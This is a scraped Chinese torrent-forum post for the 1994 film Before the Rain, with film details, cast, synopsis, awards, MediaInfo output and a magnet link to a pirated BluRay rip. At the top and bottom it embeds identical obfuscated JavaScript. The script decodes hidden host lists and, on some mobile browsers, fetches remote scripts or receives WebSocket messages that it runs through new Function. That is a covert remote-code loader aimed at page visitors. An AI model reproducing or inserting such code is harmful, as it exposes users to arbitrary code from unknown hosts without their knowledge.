暴雨将至[简繁字幕].Before.The.Rains.1994.BluRay.1080p.DTS-HD.MA5.1.x265.10bit 9.40GB

版主小s 29天前 207

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 暴雨将至 / 山雨欲来 / 雨前 / Before the Rain / Pred dozhdot

◎片 名 Пред дождот

◎年 代 1994

◎产 地 北马其顿 / 法国 / 英国

◎类 别 剧情 / 战争

◎语 言 马其顿语 / 英语 / 阿尔巴尼亚语 / 法语

◎上映日期 1994-09-01(威尼斯电影节)

◎IMDb链接 https://www.imdb.com/title/tt0110882/

◎豆瓣评分 8.7/10 (24768人评价)

◎豆瓣链接 https://movie.douban.com/subject/1303036/

◎片 长 113 分钟

◎导 演 米尔科·曼彻夫斯基 Milcho Manchevski (id:1028091)

◎编 剧 米尔科·曼彻夫斯基 Milcho Manchevski (id:1028091)

◎演 员 格莱戈尔·科林 Grégoire Colin (id:1077830)

Dzemail Maksut Dzemail Maksut (id:1118147)

拉宾娜·米特威斯卡 Labina Mitevska (id:1292245)

米莉察·斯托扬诺娃 Milica Stojanova (id:1151739)

彼得·米尔切夫斯基 Petar Mircevski (id:1119304)

拉德·舍博德兹加 Rade Serbedzija (id:1025225)

Katerina Kocevska Katerina Kocevska (id:1104345)

凯特琳·卡特利吉 Katrin Cartlidge (id:1045067)

Abdurrahman Shala Abdurrahman Shala (id:1042110)

Daniel Newman Daniel Newman (id:1131553)

菲丽达·劳 Phyllida Law (id:1048232)

Ljupcho Todorovski Ljupcho Todorovski (id:1408469)

Peter Needham Peter Needham (id:1136399)

Aleksandar Mikic Aleksandar Mikic (id:1395457)

梅托·约瓦诺夫斯基 Meto Jovanovski (id:1104929)

Silvija Stojanovska Silvija Stojanovska (id:1349842)

Jordan Vitanov Jordan Vitanov (id:1160373)

杰伊·维利尔斯 Jay Villiers (id:1154074)

塞多米尔·科拉尔 Cédomir Kolar (id:1288842)

Cat Villiers Cat Villiers (id:1038271)

David Redman David Redman (id:1295364)

Chris Thompson Chris Thompson (id:1299173)

Sue Yelland Sue Yelland (id:1301454)

卡罗琳·哈里斯 Caroline Harris (id:1286088)

Joan Hills Joan Hills (id:1286645)

Sandra Ivatovic Sandra Ivatovic (id:1113179)

Radmila Todorovic Radmila Todorovic (id:1105967)

莫拉格·罗斯 Morag Ross (id:1296145)

Alex Nikolic (id:1270190)

Piers Thompson Piers Thompson (id:1307182)

Zoran Mladenovic Zoran Mladenovic (id:1125736)

◎标 签 马其顿 / 欧洲电影 / 剧情 / 曼切夫斯基 / 民族 / 法国 / 欧洲 / 战争

◎简 介

在马其顿,战争中的波斯尼亚,东正教的一位年轻修士以沉默保护一位年轻女孩,这位阿尔巴尼亚女孩涉嫌杀害一位东正教徒。但其实只是误会。修士以自己的善良决定与女孩私奔。

在伦敦,一位摄影记者(凯特琳·卡特利吉 Katrin Cartlidge 饰)在餐馆与她的丈夫谈论感情变淡的问题,二人争吵激烈之时,一名种族主义者冲入餐馆开枪扫射。爱,在生死之间突然变得清晰。

一位离开好友的摄影记者(拉德·舍博德兹加 Rade Serbedzija 饰)从伦敦出发,回到16年没来的老家马其顿。这里有他的老朋友,他的东正教朋友们,还有与阿尔巴尼亚人的种族矛盾。摄影记者尝试通过和解的方式化解纷争,但是,这一切远没有他想象的那么简单。

“圆圈不是一个圆。”三段相互交错的故事,不同文化、宗教、民族的误会造成的悲剧。

◎获奖情况 (共6项)

第67届奥斯卡金像奖 (1995)

最佳外语片(提名)

└──米尔科·曼彻夫斯基 (id:1028091)

第51届威尼斯电影节 (1994)

金狮奖

└──米尔科·曼彻夫斯基 (id:1028091)

费比西奖(国际影评人联盟奖)

└──米尔科·曼彻夫斯基 (id:1028091)

帕西内蒂奖 最佳男演员

└──拉德·舍博德兹加 (id:1025225)

电影未来奖 Best Film in Competition

└──米尔科·曼彻夫斯基 (id:1028091)

天主教人道精神奖 荣誉提及

└──米尔科·曼彻夫斯基 (id:1028091)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 265216328558032495066330469294112367271 (0xC786CE9069325DC62E0A9A94E3E5E2A7)

  4. Complete name : B[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.40 GiB

  8. Duration : 1 h 53 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 11.9 Mb/s

  11. Encoded date : UTC 2021-11-02 08:57:09

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 53 min

  21. Bit rate : 9 962 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 038 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.208

  31. Stream size : 7.87 GiB (84%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 9962 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1038 / interlace=0 / total-frames=162718 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 53 min

  49. Bit rate mode : Variable

  50. Bit rate : 1 901 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 16 bits

  56. Compression mode : Lossless

  57. Stream size : 1.50 GiB (16%)

  58. Title : English DTS-HD Master Audio 5.1 @ 1901 kbps

  59. Language : English

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. Format : PGS

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 1 h 49 min

  68. Bit rate : 13.2 kb/s

  69. Count of elements : 1407

  70. Stream size : 10.3 MiB (0%)

  71. Title : Chs/SUP 简体

  72. Language : Chinese

  73. Default : Yes

  74. Forced : No


  75. Text #2

  76. ID : 4

  77. Format : PGS

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 49 min

  81. Bit rate : 13.8 kb/s

  82. Count of elements : 1407

  83. Stream size : 10.8 MiB (0%)

  84. Title : Cht/SUP 繁体

  85. Language : Chinese

  86. Default : No

  87. Forced : No


  88. Menu

  89. 00:00:00.000 : en:第 01 章

  90. 00:03:44.391 : en:第 02 章

  91. 00:10:47.981 : en:第 03 章

  92. 00:13:50.204 : en:第 04 章

  93. 00:25:19.643 : en:第 05 章

  94. 00:30:06.430 : en:第 06 章

  95. 00:35:47.020 : en:第 07 章

  96. 00:40:55.828 : en:第 08 章

  97. 00:50:27.524 : en:第 09 章

  98. 01:00:16.071 : en:第 10 章

  99. 01:05:57.620 : en:第 11 章

  100. 01:12:24.632 : en:第 12 章

  101. 01:17:46.453 : en:第 13 章

  102. 01:27:05.178 : en:第 14 章

  103. 01:30:37.891 : en:第 15 章

  104. 01:31:59.431 : en:第 16 章

  105. 01:42:22.845 : en:第 17 章

  106. 01:47:47.419 : en:第 18 章

  107. 01:49:45.704 : en:第 19 章

  108. 01:52:55.352 : en:第 20 章




复制代码


TAGS 剧情 战争

磁力链:
  • magnet:?xt=urn:btih:E0F706873C65336C3E1907270B3B07F793DB2B27

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};